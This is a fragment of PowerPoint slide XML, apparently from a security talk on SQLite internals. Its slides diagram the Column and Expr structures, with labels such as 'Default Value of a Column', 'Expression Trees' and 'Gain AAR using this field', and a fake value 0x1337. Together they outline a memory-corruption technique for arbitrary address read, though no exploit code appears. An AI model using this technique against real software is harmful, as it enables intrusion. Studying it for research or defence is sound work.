              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>  u8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>szEst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/* Estimated size of value in this column. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(INT)==1 */</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>  u8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>colFlags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/* Boolean properties.  See COLFLAG_ defines below */</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>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8" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241040" y="1480390"/>
            <a:ext cx="4358951" cy="5241255"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Default Value of a Column</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Expression Trees</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gain AAR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>using this field</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5122505" y="3323248"/>
            <a:ext cx="4021495" cy="278378"/>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740096581"/>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96925" y="488880"/>
            <a:ext cx="3645258" cy="1293741"/>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TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2256783" y="239498"/>
            <a:ext cx="1068309" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="75000"/>
              <a:lumOff val="25000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Table</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2496925" y="923637"/>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2567708" y="516588"/>
            <a:ext cx="3491345" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>“Table 1”</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2496925" y="1343892"/>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567709" y="939149"/>
            <a:ext cx="3491345" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Column *</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2558471" y="1378591"/>
            <a:ext cx="3491345" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2496925" y="2281385"/>
            <a:ext cx="3645258" cy="1293741"/>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TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2256784" y="2032003"/>
            <a:ext cx="1068308" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="75000"/>
              <a:lumOff val="25000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Column</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Connector 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2496925" y="2716142"/>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567708" y="2309093"/>
            <a:ext cx="3491345" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>“Column 1”</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Connector 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2496925" y="3136397"/>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567709" y="2731654"/>
            <a:ext cx="3491345" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Expr *</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2558471" y="3171096"/>
            <a:ext cx="3491345" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6838016" y="488880"/>
            <a:ext cx="3645258" cy="262820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TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6597875" y="239498"/>
            <a:ext cx="1068308" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="75000"/>
              <a:lumOff val="25000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Expr</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Straight Connector 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6838016" y="923637"/>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908799" y="516588"/>
            <a:ext cx="3491345" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>OP_Noop</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Straight Connector 21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6838016" y="1343892"/>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6908800" y="939149"/>
            <a:ext cx="3491345" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6899562" y="1378591"/>
            <a:ext cx="3491345" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>EP_Skip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>EP_Reduced</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Straight Connector 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6838016" y="1782621"/>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6838016" y="2230585"/>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6838016" y="2683168"/>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6899561" y="1819239"/>
            <a:ext cx="3491345" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>“0x1337”</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6899560" y="2281057"/>
            <a:ext cx="3491345" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Expr *</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6908799" y="2720045"/>
            <a:ext cx="3491345" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Rectangle 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6838016" y="3652794"/>
            <a:ext cx="3645258" cy="204604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TextBox 44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6597875" y="3403411"/>
            <a:ext cx="1068308" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="75000"/>
              <a:lumOff val="25000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Expr</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="46" name="Straight Connector 45"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6838016" y="4087550"/>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6908799" y="3680501"/>
            <a:ext cx="3491345" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>OP_DropTrigger</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="48" name="Straight Connector 47"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6838016" y="4507805"/>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6908800" y="4103062"/>
            <a:ext cx="3491345" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="TextBox 49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6899562" y="4542504"/>
            <a:ext cx="3491345" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>EP_TokenOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>EP_Static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>EP_Leaf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>EP_IntValue</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="57" name="Straight Connector 56"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6838016" y="5237021"/>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6899559" y="5272183"/>
            <a:ext cx="3491345" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>0x1337</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="60" name="Curved Connector 59"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2" idx="1"/>
            <a:endCxn id="12" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2256785" y="1135751"/>
            <a:ext cx="240141" cy="1080918"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 195194"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="22225">
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="62" name="Curved Connector 61"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="3"/>
            <a:endCxn id="19" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6142183" y="424164"/>
            <a:ext cx="455692" cy="2504092"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33785"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="22225">
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
